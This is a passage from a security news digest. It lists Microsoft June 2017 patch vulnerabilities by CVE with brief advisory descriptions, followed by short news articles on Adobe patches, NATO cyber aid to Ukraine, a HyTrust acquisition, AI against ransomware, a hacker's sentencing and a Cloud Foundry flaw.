A remote code execution vulnerability exists in the way the Microsoft Edge JavaScript scripting engine handles objects in memory.This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8522) MS Rating: Critical

A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8524) MS Rating: Critical

A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Microsoft Edge Memory Corruption Vulnerability (CVE-2017-8548) MS Rating: Critical

A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Remote Code Execution Vulnerability (CVE-2017-8549) MS Rating: Critical

A remote code execution vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited this issue could obtain information to further compromise the user�s system.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8499) MS Rating: Critical

A remote code execution vulnerability exists in the way the Microsoft Edge JavaScript scripting engine handles objects in memory. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Internet Explorer Memory Corruption Vulnerability (CVE-2017-8519) MS Rating: Important

A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. This vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8521) MS Rating: Important

A remote code execution vulnerability exists in the way the Microsoft Edge JavaScript scripting engine handles objects in memory. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Microsoft Edge Memory Corruption Vulnerability (CVE-2017-8523) MS Rating: Important

A security bypass vulnerability exists when Microsoft Edge fails to correctly apply Same Origin Policy for HTML elements present in other browser windows. An attacker can exploit this issue to trick a user into loading a page with malicious content.

Microsoft Browser Information Disclosure Vulnerability (CVE-2017-8529) MS Rating: Important

An information disclosure vulnerability exists when affected Microsoft scripting engines do not properly handle objects in memory. The vulnerability could allow an attacker to detect specific files on the user's computer.

Microsoft Edge Security Feature Bypass Vulnerability (CVE-2017-8530) MS Rating: Important

A security bypass vulnerability that affects Microsoft Edge.

Internet Explorer Memory Corruption Vulnerability (CVE-2017-8547) MS Rating: Important

A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. This vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Microsoft Edge Security Feature Bypass Vulnerability (CVE-2017-8555) MS Rating: Important

A security bypass vulnerability exists when the Edge Content Security Policy (CSP) fails to properly validate certain specially crafted documents. An attacker can exploit this issue to trick a user into loading a web page with malicious content.

Microsoft Edge Information Disclosure Vulnerability (CVE-2017-8498) MS Rating: Moderate

An information disclosure vulnerability exists in Microsoft Edge that allows JavaScript XML DOM objects to detect installed browser extensions. To exploit the vulnerability, in a web-based attack scenario, an attacker could host a malicious website in an attempt to make a user visit it.

Microsoft Edge Information Disclosure Vulnerability (CVE-2017-8504) MS Rating: Low

An information disclosure vulnerability exists when the Microsoft Edge Fetch API incorrectly handles a filtered response type. An attacker could use the vulnerability to read the URL of a cross-origin request.

Cumulative Security Update for Microsoft Office

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-0260) MS Rating: Important

A remote code execution vulnerability exists when Office improperly validates input before loading dynamic link library (DLL) files. An attacker who successfully exploited this issue could take control of an affected system.

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8506) MS Rating: Important

A remote code execution vulnerability exists when Office improperly validates input before loading dynamic link library (DLL) files. An attacker who successfully exploited this issue could take control of an affected system.

Microsoft Office Memory Corruption Vulnerability (CVE-2017-8507) MS Rating: Important

A remote code execution vulnerability exists in the way that Microsoft Outlook parses specially crafted email messages. An attacker who successfully exploited this issue could take control of an affected system.

Microsoft Office Security Feature Bypass Vulnerability (CVE-2017-8508) MS Rating: Important

A security bypass vulnerability exists in Microsoft Office software when it improperly handles the parsing of file formats. The security bypass by itself does not allow arbitrary code execution.

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8509) MS Rating: Important

A remote code execution vulnerability exist in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8510) MS Rating: Important

A remote code execution vulnerability exist in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

MicrosoftOffice Remote Code Execution Vulnerability (CVE-2017-8511) MS Rating: Important

A remote code execution vulnerability exist in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8512) MS Rating: Important

A remote code execution vulnerability exist in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

Microsoft PowerPoint Remote Code Execution Vulnerability (CVE-2017-8513) MS Rating: Important

A remote code execution vulnerability exist in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

Microsoft SharePoint Reflective XSS Vulnerability (CVE-2017-8514) MS Rating: Important

A cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. An authenticated attacker could exploit this vulnerability by sending a specially crafted request to an affected SharePoint server.

Microsoft Outlook for Mac Spoofing Vulnerability (CVE-2017-8545) MS Rating: Important

A spoofing vulnerability exists when Microsoft Outlook for Mac does not sanitize html or treat it in a safe manner. An attacker who successfully tricked the user could gain access to the user's authentication information or login credentials.

Microsoft SharePoint XSS vulnerability (CVE-2017-8551) MS Rating: Important

A privilege escalation vulnerability exists when SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server. An authenticated attacker could exploit the vulnerability by sending a specially crafted request to an affected SharePoint server. Successful exploits may allow an attacker to perform cross-site scripting attacks.

Cumulative Security Update for Microsoft Windows Hyper-V

Hypervisor Code Integrity Elevation of Privilege Vulnerability (CVE-2017-0193) MS Rating: Important

A privilege escalation vulnerability exists when Windows Hyper-V instruction emulation fails to properly enforce privilege levels. An attacker who successfully exploited this issue could gain elevated privileges on a target guest operating system.

Cumulative Security Update for Skype for Business

Skype for Business Remote Code Execution Vulnerability (CVE-2017-8550) MS Rating: Critical

A remote code execution vulnerability exists when Skype for Business and Microsoft Lync Servers fail to properly sanitize specially crafted content. An authenticated attacker who successfully exploited this issue could execute HTML and JavaScript content in the Skype for Business or Lync context.

Cumulative Security Update for Microsoft Windows Uniscribe

Windows Uniscribe Remote Code Execution Vulnerability (CVE-2017-8527) MS Rating: Critical

A remote code execution vulnerability exist when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this issue could take control of the affected system.

Windows Uniscribe Remote Code Execution Vulnerability (CVE-2017-8528) MS Rating: Critical

A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this issue could take control of the affected system.

Windows Uniscribe Remote Code Execution Vulnerability (CVE-2017-0283) MS Rating: Critical

A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker can exploit this issue could take control of the affected system.

Windows Uniscribe Information Disclosure Vulnerability (CVE-2017-0282) MS Rating: Important

An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user�s system.

Windows Uniscribe Information Disclosure Vulnerability (CVE-2017-0284) MS Rating: Important

An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user�s system.

Windows Uniscribe Information Disclosure Vulnerability (CVE-2017-0285) MS Rating: Important

An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user�s system.

Windows Uniscribe Information Disclosure Vulnerability (CVE-2017-8534) MS Rating: Important

An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user�s system.

Cumulative Security Update for Microsoft Windows Graphics

Windows Graphics Information Disclosure Vulnerability (CVE-2017-0286) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information further compromise the user�s system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-0287) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information further compromise the user�s system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-0288) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information further compromise the user�s system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-0289) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information further compromise the user�s system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-8531) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information further compromise the user�s system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-8532) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information further compromise the user�s system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-8533) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information further compromise the user�s system.

Cumulative Security Update for Microsoft Windows Kernel-Mode Drivers

Windows Kernel Elevation of Privilege Vulnerability (CVE-2017-0297) MS Rating: Important

A privilege escalation vulnerability exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited this issue could execute code with elevated permissions.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-0299) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this issue could retrieve the base address of the kernel driver from a compromised process.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-0300) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this issue could retrieve the base address of the kernel driver from a compromised process.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8462) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this issue could retrieve the base address of the kernel driver from a compromised process.

Win32k Elevation of Privilege Vulnerability (CVE-2017-8465) MS Rating: Important

A privilege escalation vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this issue could run processes in an elevated context.

Win32k Elevation of Privilege Vulnerability (CVE-2017-8468) MS Rating: Important

A privilege escalation vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this issue could run processes in an elevated context.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8469) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8470) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8471) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8472) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8473) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8474) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8475) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8476) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8477) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8478) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8479) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8480) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8481) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8482) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8483) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8484) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8485) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8488) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8489) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8490) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8491) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8492) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Cumulative Security Update for Microsoft Windows

LNK Remote Code Execution Vulnerability (CVE-2017-8464) MS Rating: Critical

A remote code execution exists in Microsoft Windows that could allow remote code execution if the icon of a specially crafted shortcut is displayed. An attacker who successfully exploited this issue could gain the same user rights as the local user.

Windows PDF Remote Code Execution Vulnerability (CVE-2017-0291) MS Rating: Critical

A remote code execution vulnerability exists in Microsoft Windows if a user opens a specially crafted PDF file. An attacker who successfully exploited this issue could cause arbitrary code to execute in the context of the current user.

Windows PDF Remote Code Execution Vulnerability (CVE-2017-0292) MS Rating: Critical

A remote code execution vulnerability exists in Microsoft Windows if a user opens a specially crafted PDF file. An attacker who successfully exploited this issue could cause arbitrary code to execute in the context of the current user.

Windows Remote Code Execution Vulnerability (CVE-2017-0294) MS Rating: Critical

A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. To exploit the vulnerability, an attacker would have to convince a user to either open a specially crafted cabinet file or spoof a network printer and trick a user into installing a malicious cabinet file disguised as a printer driver.

Windows Search Remote Code Execution Vulnerability (CVE-2017-8543) MS Rating: Critical

A remote code execution vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this issue could take control of the affected system.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0173) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0215) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0216) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0218) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0219) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Windows Default Folder Tampering Vulnerability (CVE-2017-0295) MS Rating: Important

A tampering vulnerability exists in Microsoft Windows that could allow an authenticated attacker to modify the folder structure. An attacker who successfully exploited this issue could potentially modify files and folders that are synchronized the first time when a user logs in locally to the computer.

Windows TDX Elevation of Privilege Vulnerability (CVE-2017-0296) MS Rating: Important

A privilege escalation vulnerability exists when tdx. sys fails to check the length of a buffer prior to copying memory to it.

Windows COM Session Elevation of Privilege Vulnerability (CVE-2017-0298) MS Rating: Important

A privilege escalation exists in Windows when a DCOM object in Helppane. exe, configured to run as the interactive user, fails to properly authenticate the client.

Windows PDF Information Disclosure Vulnerability (CVE-2017-8460) MS Rating: Important

An information disclosure vulnerability exists in Microsoft Windows when a user opens a specially crafted PDF file. An attacker who successfully exploited this issue could read information in the context of the current user.

Windows Cursor Elevation of Privilege Vulnerability (CVE-2017-8466) MS Rating: Important

A privilege escalation vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited this issue could run processes in an elevated context.

Windows Security Feature Bypass Vulnerability (CVE-2017-8493) MS Rating: Important

A security bypass vulnerability exists when Microsoft Windows fails to enforce case sensitivity for certain variable checks, which could allow an attacker to set variables that are either read-only or require authentication.

Windows Elevation of Privilege Vulnerability (CVE-2017-8494) MS Rating: Important

A privilege escalation vulnerability exists when Windows Secure Kernel Mode fails to properly handle objects in memory.To exploit the vulnerability, a locally-authenticated attacker could attempt to run a specially crafted application on a targeted system.

Windows VAD Cloning Denial of Service Vulnerability (CVE-2017-8515) MS Rating: Important

A denial of service vulnerability exists in Microsoft Windows when an unauthenticated attacker sends a specially crafted kernel mode request. An attacker who successfully exploited this issue could cause a denial of service on the target system, causing the machine to either stop responding or reboot.

Windows Search Information Disclosure Vulnerability (CVE-2017-8544) MS Rating: Important

An information disclosure vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this issue could obtain information to further compromise the user�s system.

GDI Information Disclosure Vulnerablity (CVE-2017-8553) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this issue could obtain information to further compromise the user�s system.


Adobe Fixes Vulnerabilities in Flash Player, Connect

11.7.2017 securityweek Vulnerebility

Adobe today released updates for its Flash Player and Connect products to address several vulnerabilities that can be exploited for remote code execution, information disclosure, cross-site scripting (XSS) attacks, and clickjacking.

An advisory published by Adobe for Flash Player shows that version 26.0.0.137 patches three critical vulnerabilities, including ones that can be exploited to take control of affected systems.

The list includes a critical memory corruption flaw that can lead to remote code execution (CVE-2017-3099) and two important information disclosure weaknesses caused by memory corruption and security bypass issues (CVE-2017-3100 and CVE-2017-3080). Jihui Lu of Tencent KeenLab and a researcher who uses the online moniker “bo13oy” have been credited for finding CVE-2017-3099, respectively CVE-2017-3100.

In the case of the Connect web conferencing software, Adobe patched three less severe vulnerabilities. The security holes have been described as a user interface bug that can be exploited for clickjacking attacks (CVE-2017-3101) and input validation problems that can allow reflected and stored XSS attacks (CVE-2017-3102, CVE-2017-3103).

The flaws, discovered by Anas Roubi, Adam Willard of Raytheon Foreground Security, and Alexis Laborier, affect Connect for Windows and they have been patched with the release of version 9.6.2.

Adobe said it was not aware of any attacks exploiting these vulnerabilities, but pointed out that some details of the Flash Player flaw tracked as CVE-2017-3080 were made public on July 3.


NATO Providing Cybersecurity Equipment to Ukraine

11.7.2017 securityweek BigBrothers

NATO Takes Steps to Bolster Ukrainian Cyber Security

Ukraine is an area of great geopolitical significance -- a sort of buffer zone between NATO and Russia -- that both sides seek to influence. Crimea aside, neither side wishes to be too overt with military intervention, and the result is tailor-made for modern cyber warfare.

What remains of Ukraine is politically west-leaning and NATO-cooperative. This places Russia in the position of protagonist; and while it should be said that there is little direct proof of Russia-led cyber warfare, there is equally little doubt in the minds of many security researchers.

Two examples will immediately come to mind: the power disruptions over the Christmas period of 2015, and the more recent NotPetya ransomware outbreak. The latter started in the Ukraine before spreading worldwide. It appears to have emanated from Ukrainian accounting software called MEDoc, but is now thought by some to be a wiper cyberweapon disguised as ransomware "apparently launched by the same threat group that initiated numerous other attacks against the country’s power grid, mining and railway systems, and Ukrainian government organizations."

NATO's official policy towards Ukraine is to bolster its independence.

"A sovereign, independent and stable Ukraine, firmly committed to democracy and the rule of law, is key to Euro-Atlantic security," it says. "Since 2014, in the wake of the Russia-Ukraine conflict, cooperation has been intensified in critical areas."

Cyber security is one of those critical areas. In December 2014, NATO established a Trust Fund designed "to provide Ukraine with the necessary support to develop its strictly defensive, CSIRT-type technical capabilities, including laboratories to investigate cyber security incidents."

By June 2016, eight nations had contributed a total of €965,000, plus in-kind contributions from Estonia and the USA. This week, the project appears to have moved to the next step at a joint briefing with NATO secretary general, Jens Stoltenberg, and Ukrainian president Petro Poroshenko in Kiev on Monday.

Ukrinform, the national news agency of Ukraine, reported Monday, "He [Stoltenberg] said that one of the areas where the alliance was paying more attention in its cooperation with Ukraine was the sector of cyber security. NATO is currently in the process of providing Ukraine with new equipment for some key government institutions and authorities, which will enable Ukraine to investigate who is behind certain cyber-attacks, because the response to them is extremely important, Stoltenberg said. And it should also help Ukraine protect its key government institutions from cyber-attacks, he added."

NotPetya is exactly the sort of cyber-attack that such defenses will need to prevent.


HyTrust Acquires DataGravity, Raises $36 Million

11.7.2017 securityweek  IT

Cloud security firm HyTrust today announced that it has acquired data visibility and security company DataGravity, and raised $36 million in a new funding round.

Terms of the acquisition have not been disclosed, but members of the DataGravity team will join HyTrust. By acquiring DataGravity, HyTrust hopes to further enhance its security policy enforcement capabilities for cloud workloads through new data discovery and classification expertise.

DataGravity, which in the past years managed to raise a total of $92 million, exited stealth mode in 2014 when it launched Discovery, a platform that provided data security, and search and discovery capabilities. The company later released the DataGravity for Virtualization virtual appliance.HyTrust acquires DataGravity

HyTrust’s decision to acquire DataGravity comes shortly after Forrester estimated that the global cloud security market will increase to $3.5 billion by 2021, which represents an annual growth rate of 28 percent.

“The acquisition will accelerate the expansion of HyTrust's platform capabilities and capitalize on the high-growth cloud security market,” said Eric Chiu, co-founder and president of HyTrust. “DataGravity's data discovery and classification capabilities support HyTrust's mission to deliver a security policy framework that provides customers with full visibility, insight and enforcement of policy across workloads. We couldn't be more excited.”

HyTrust also announced that it has closed a $36 million funding round led by investment firm Advance Venture Partners (AVP), which brings the total raised by the company to $100 million. Sway Ventures, Epic Ventures, Vanedge Capital, Trident Capital, and strategic investors Cisco, Fortinet, Intel and VMware also participated.

Part of the $36 million have been used to acquire DataGravity and the rest will go towards expanding sales and marketing efforts, and funding new product development.

“HyTrust is very well positioned to capitalize on a tremendous growth opportunity in the cloud security space,” said David ibnAle, founding partner at AVP. “The need for security, automated compliance and policy enforcement for cloud infrastructure and data is critical in almost every industry, and HyTrust is front and center in this field. Gartner's recent highlighting of the sector as a top security technology for 2017 underscores the relevance of HyTrust's solutions, and we are extremely excited about the opportunity to back the market leader in this space.”


Calling Artificial Intelligence to Counter Ransomware Attacks
11.7.2017 securityaffairs
Ransomware

The progression in Artificial Intelligence have incited intense debate worldwide, some experts are calling AI to counter malware attacks
In a short span of six weeks, the world was hit twice by major ransomware attacks — malicious software that seizes the data stored on your computer systems and would only release it to you upon receiving ransom money.

It goes without saying that the world is in dire need of better defense mechanism, and mercifully they have started to arise but in a rather slower and in patchwork fashion. The day we would feel completely secure, we may have artificial intelligence to thank.

Ransomware is not necessarily the trickiest or the most dangerous forms of malware that can hack into your computer, but it surely is infuriating and at many instances devastating. The majority types of infections that sneak into your systems don’t lock down your personal pictures or documents the way ransomware does and nor do they demand money.

Despite knowing the risks, there are many who aren’t very savvy enough to keep up with the security software updates. Both of the recent ransomware attacks thwacked users who were unsuccessful at installing the security update which Windows released a few months earlier.

Artificial Intelligence
The progression in Artificial Intelligence have incited intense debate worldwide. Science fiction is nearing reality and AI products are taking over households and workplace. Concerns about the potential takeover of AI over the job market is rising. Discussions are also live about the detrimental effects of an AI singularity, taking over the world and terminating the human race.

Though these debates are all valid, I strongly hold the opinion that AI should not only be concentrated to just home gadgets or on process optimization and automation. Instead, AI can be put to use in solving the greater problems the world is facing.

artificial intelligence malware

AI in tackling Ransomware
2015 saw around 707 million cybersecurity breaches while in 2016 the figure reached 554 million in just the first half.

Detecting Malware
Earlier, the identification of malicious programs was done by matching the program’s code against a database of identified malware. Though this method was only as good as the database and would ultimately get outdated, allowing new malware variants to easily sneak in.

Hence, security companies started to gauge a malware by its behavior. For instance, in the case of ransomware, the software may go for repetitive tries to lock files by encrypting them. But this could also flag regular computer behavior for example file compression.

The modern techniques now include considering a combination of behaviors. Such as, a program which is encrypting files without displaying a progress bar on the monitor could be signaled as a surreptitious activity. But the drawback here is that it slows down the process of harmful software identification, also locking up some of the files.

Provision
The growing number of alerts being generated by the traditional tools is only increasing the struggle for the security teams. AI, with its ability to self-learn and automate, can raise the effectiveness and cut cost, guarding us from terrorism or attacks of rather smaller scale.

Moving further, the existing AI-centric solutions in the industry are more pro-active. They have the ability to anticipate attacks beforehand by detecting patterns and glitches pertaining to malicious content.

Secureworks utilizes the predictive competencies of AI for advanced threat recognition globally. SiftScience, Cylance, and Deep Instinct are using it to prevent frauds and for endpoint security, like smartphones and laptops. These technologies hold the potential to radically magnify the possibilities and scale of security specialists and enable them to sense incoming threats before they actually materialize.


Russian Hacker Living in U.S. Sentenced to Prison

11.7.2017 securityweek BigBrothers

A Russian-born U.S. citizen has been sentenced to 110 months in prison for running a sophisticated cybercrime operation that involved botnets, stolen financial data and money laundering.

Alexander Tverdokhlebov, 29, has been living in Los Angeles. He emigrated from Russia in 2007 and later obtained U.S. citizenship.

According to U.S. authorities, Tverdokhlebov was an active member on several exclusive Russian-speaking cybercrime forums since at least 2008. He is said to have offered various services, including for laundering illegal proceeds.

The man also operated botnets that allowed cybercriminals to steal payment cards and other data. Investigators said Tverdokhlebov boasted about possessing 40,000 credit card numbers and controlling as many as half a million computers between 2009 and 2013.

The hacker sold the stolen card data to individuals who used it to make fraudulent purchases or withdrawals from the victims’ accounts. He is also said to have recruited Russian students visiting the U.S. to receive money from victims and then forward it to Tverdokhlebov and his accomplices.

Authorities believe Tverdokhlebov’s activities resulted in losses between $9.5 and $25 million. When he was arrested, investigators found $275,000 in cash distributed across several safety deposit boxes in Las Vegas and Los Angeles. They also seized Bitcoin and other assets valued at roughly $5 million.

Tverdokhlebov pleaded guilty to wire fraud in late March and he has now been sentenced to 110 months in prison and three years of supervised release, which includes the monitoring of his computer use.

Several Russian nationals have been charged or convicted recently for cybercrimes in the United States. Yevgeniy Aleksandrovich Nikulin has been charged for hacking into the systems of LinkedIn, Dropbox and Formspring and will be extradited from the Czech Republic, two Russian Federal Security Service (FSB) officers have been indicted over the 2014 Yahoo hack, and the author of the Citadel malware recently pleaded guilty.

A lengthy prison sentence was given recently to 32-year-old Roman Valeryevich Seleznev, convicted on 38 counts in relation to a point-of-sale (PoS) hacking scheme.


Cloud Foundry has disclosed a privilege escalation flaw in User Account and Authentication software
11.7.2017 securityaffairs Hacking

The Open source devops platform Cloud Foundry fixed a bug that affects its User Account and Authentication server software.
The Open source devops platform Cloud Foundry has disclosed a vulnerability, tracked as CVE-2017-8032, that affects its User Account and Authentication server software. The flaw, rated by the organization as high-severity, could be exploited by zone administrators to escalate their privileges when mapping permissions for an external provider.

The User Account and Authentication is the Cloud Foundry ID management service that implements the OAuth2 authentication protocol.

Cloud Foundry disclosed a privilege escalation flaw in UAA software

CVE-2017-8032 was patched in an update last week, and the detailed advisory landed June 12 here.

